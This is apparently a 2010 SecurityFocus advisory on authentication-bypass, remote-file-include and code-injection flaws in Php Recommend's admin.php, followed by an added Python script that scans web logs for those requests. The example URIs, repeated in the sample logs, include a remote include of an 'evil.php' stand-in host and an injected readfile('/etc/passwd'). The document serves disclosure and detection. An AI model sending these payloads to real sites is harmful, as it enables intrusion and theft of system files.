Php Recommend 'admin.php' Multiple Remote Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

For the authentication-bypass vulnerability:
http://www.example.com/admin.php?submit=submit&form_admin_user=USERNAME&form_admin_pass=PASSWORD

For the remote-file-include vulnerability:
http://www.example.com/admin.php?submit=submit&form_include_template=http://example.com/evil.php

For the code-injection vulnerability:
http://www.example.com/admin.php?submit=submit&form_aula=';readfile('/etc/passwd');'
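
To check web-server access logs for the three request shapes shown above, a defender can match on the parameter names from the example URIs. The Python below is an added example, not part of the original advisory; the log lines are constructed, and the heuristics (a URL scheme in form_include_template, quote-semicolon or function-call syntax in form_aula) are assumptions derived only from those URIs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /admin.php?submit=submit'
    '&form_admin_user=USERNAME&form_admin_pass=PASSWORD HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:01:00 +0000] "GET /admin.php?submit=submit'
    '&form_include_template=http://example.com/evil.php HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2010:10:02:00 +0000] "GET /admin.php?submit=submit'
    '&form_aula=%27%3Breadfile(%27/etc/passwd%27)%3B%27 HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2010:10:03:00 +0000] "GET /admin.php?submit=submit'
    '&form_aula=Room+12&form_include_template=default.tpl HTTP/1.1" 200 512',
    '192.0.2.14 - - [01/Jan/2010:10:04:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 99',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed heuristic: a template value that starts with a URL scheme.
URL_SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)
# Assumed heuristic: a quote followed by ';' or anything shaped like a call.
CODE_RE = re.compile(r"['\"]\s*;|[a-z_]\w*\s*\(", re.I)

def classify(line):
    """Return the advisory patterns that one access-log line matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/admin.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    if "form_admin_user" in params or "form_admin_pass" in params:
        findings.append("auth-bypass")
    if any(URL_SCHEME_RE.match(v) for v in params.get("form_include_template", [])):
        findings.append("remote-file-include")
    if any(CODE_RE.search(v) for v in params.get("form_aula", [])):
        findings.append("code-injection")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line that matches a pattern."""
    return [(n, f) for n, f in ((i + 1, classify(l)) for i, l in enumerate(lines)) if f]

if __name__ == "__main__":
    for line_no, findings in scan(SAMPLE_LOG):
        print(line_no, ", ".join(findings))
```

Only query-string parameters are inspected, so requests that carry the same fields in a POST body will not appear unless request bodies are logged.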


 

Copyright 2010, SecurityFocus